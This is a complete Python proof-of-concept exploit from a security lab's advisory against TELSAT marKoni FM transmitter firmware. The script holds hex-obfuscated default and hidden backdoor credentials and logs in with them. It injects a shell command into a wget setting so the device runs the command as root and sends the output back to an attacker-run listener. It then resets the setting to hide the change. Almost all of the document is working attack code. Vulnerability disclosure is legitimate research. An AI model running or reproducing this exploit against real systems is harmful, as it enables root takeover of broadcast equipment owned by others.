TELSAT marKoni FM Transmitter 1.9.5 Root Command Injection - PoC Exploit

1. #!/usr/bin/env python
2. #
3. #
4. # TELSAT marKoni FM Transmitter 1.9.5 Root Command Injection PoC Exploit
5. #
6. #
7. # Vendor: TELSAT Srl
8. # Product web page: https://www.markoni.it
9. # Affected version: Markoni-D (Compact) FM Transmitters
10. #                   Markoni-DH (Exciter+Amplifiers) FM Transmitters
11. #                   Markoni-A (Analogue Modulator) FM Transmitters
12. #                   Firmware: 1.9.5
13. #                             1.9.3
14. #                             1.5.9
15. #                             1.4.6
16. #                             1.3.9
17. #
18. # Summary: Professional FM transmitters.
19. #
20. # Desc: The marKoni FM transmitters are susceptible to unauthenticated
21. # remote code execution with root privileges. An attacker can exploit
22. # a command injection vulnerability by manipulating the Email settings'
23. # WAN IP info service, which utilizes the 'wget' module. This allows
24. # the attacker to gain unauthorized access to the system with administrative
25. # privileges by exploiting the 'url' parameter in the HTTP GET request
26. # to ekafcgi.fcgi.
27. #
28. # -------------------------------------------------------------------------
29. # [lqwrm@metalgear ~]# python yp.tiolpxe 10.0.8.3:88 backdoor 10.0.8.69 whoami
30. # Authentication successful for backdoor
31. # Injecting command: whoami
32. # Listening on port 9999
33. # ('10.0.8.3', 47302) called back
34. # Received: root
35. # Housekeeping...
36. # Zya and thanks for stopping by!
37. #
38. # [lqwrm@metalgear ~]#
39. #
40. # -------------------------------------------------------------------------
41. #
42. # Tested on: GNU/Linux 3.10.53 (armv7l)
43. #            icorem6solox
44. #            lighttpd/1.4.33
45. #
46. #
47. # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
48. # Macedonian Information Security Research and Development Laboratory
49. # Zero Science Lab - https://www.zeroscience.mk - @zeroscience
50. #
51. #
52. # Advisory ID: ZSL-2024-5808
53. # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5808.php
54. #
55. #
56. # 10.11.2023
57. #
58.  
59. from colorama import init, Fore
60. import re,os,sys,requests
61. import socket,threading
62. from time import sleep
63. init()
64.  
65. def just_listen_to_me(lport, cstop):
66.     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
67.     s.bind(("0.0.0.0", lport))
68.     s.listen(1)
69.     print("Listening on port " + str(lport))
70.     try:
71.         conn, addr = s.accept()
72.         print(addr, "called back")
73.         cstop.set()
74.     except socket.timeout:
75.         print("Call return timeout\nCheck your ports")
76.         conn.close()
77.     while True:
78.         try:
79.             odg = conn.recv(1771).decode()
80.             uam = re.search(r"User-Agent:\s*(.*)", odg)
81.  
82.             if uam:
83.                 uav = uam.group(1)
84.                 print(f"Received: {uav}")
85.                 exit()
86.             else:
87.                 print("No output for you")
88.         except:
89.             print("Housekeeping...")
90.             exit()
91.     s.close()
92.  
93. def authenticate(ipaddr, option): #### Encrypted Shit ####_"
94.     auth_url = f"http://{ipaddr}" # oOoOoOoOoOoOoOoOoOoOoOo"
95.     ep = "/cgi-bin/ekafcgi.fcgi?OpCode=" ##################"
96.     if option == "user": ##################################"
97.         username = "\x75\x73\x65\x72" #####################"
98.         password = "\x75\x73\x65\x72" #####################"
99.     elif option == "admin": ###############################"
100.         username = "\x61\x64\x6D\x69\x6E" #################"
101.         password = "\x61\x64\x6D\x69\x6E" #################"
102.     elif option == "backdoor": ############################"
103.         username = "\x66\x61\x63\x74\x6F\x72\x79" #########"
104.         password = "\x69\x6E\x6F\x6B\x72\x61\x6D\x32\x35"#_"
105.  
106.     authp = {
107.         'username': username,
108.         'password': password
109.     }
110.  
111.     resp = requests.get(auth_url + ep + "1", params=authp)
112.  
113.     if "Set-Cookie" in resp.headers:
114.         print(f"Authentication successful for {option}")
115.         auth_cookie = resp.headers["Set-Cookie"].split(";")[0]
116.         return auth_cookie
117.     else:
118.         print(f"Authentication failed for {option}.")
119.         print("Try a different option.")
120.         return None
121.  
122. def execute(ipaddr, cookie, command, listen_ip):
123.     print(f"Injecting command: {command}")
124.     ep = "/cgi-bin/ekafcgi.fcgi?OpCode="
125.     eden = f"http://{ipaddr}{ep}26&param=wget&ena=1&url=-U%20%60{command}%60%20{listen_ip}:9999"
126.     dva = f"http://{ipaddr}{ep}27"
127.     tri = f"http://{ipaddr}{ep}26&param=wget&ena=0&url="
128.     clear = f"http://{ipaddr}{ep}3&com1=203C%20001001"
129.  
130.     headers = {"Cookie": cookie}
131.  
132.     requests.get(eden, headers=headers)
133.     sleep(2)
134.     requests.get(dva, headers=headers)
135.     sleep(2)
136.     requests.get(tri, headers=headers)
137.     sleep(1)
138.     requests.get(clear, headers=headers)
139.     print("Zya and thanks for stopping by!")
140.     exit(0)
141.  
142. def njaaah(text):
143.     columns = os.get_terminal_size().columns
144.     print(text.center(columns))
145.  
146. zsl = "\033[91mWaddup!\033[0m" #Win64
147. mrjox = f"""
148.     ________
149.   /          \\
150.  /    ____    \\
151. |   /    0 \\   |
152. |   \\______/   |
153.  \\____________/  {zsl}
154.       | |
155.      /   \\
156.     /  O  \\
157.    |    O  \\
158.    |       \\
159.    |        \\
160.    |_________|
161.        """
162.  
163. if len(sys.argv) != 5:
164.     print()
165.     print("This is a PoC script for the marKoni transmitters 0day")
166.     print("Usage: python yp.tiolpxe <target_ip:port> <option> <listen_ip> <command>")
167.     print("Option: 'user', 'admin', 'backdoor'")
168.     print("Default listening port: 9999")
169.     njaaah(mrjox)
170.     exit()
171.  
172. ipaddr = sys.argv[1]
173. opt = sys.argv[2]
174. listen_ip = sys.argv[3]
175. command = sys.argv[4]
176.  
177. opt_map = {
178.     "admin"    : "admin",
179.     "user"     : "user",
180.     "backdoor" : "backdoor"
181. }
182.  
183. if opt in opt_map:
184.     auth_cookie = authenticate(ipaddr, opt_map[opt])
185.     if auth_cookie:
186.         cstop = threading.Event()
187.         lt = threading.Thread(target=just_listen_to_me, args=(9999, cstop))
188.         lt.start()
189.         execute(ipaddr, auth_cookie, command, listen_ip)
190.         cstop.set()
191.         lt.join()
192. else:
193.     print("Invalid option.")
194.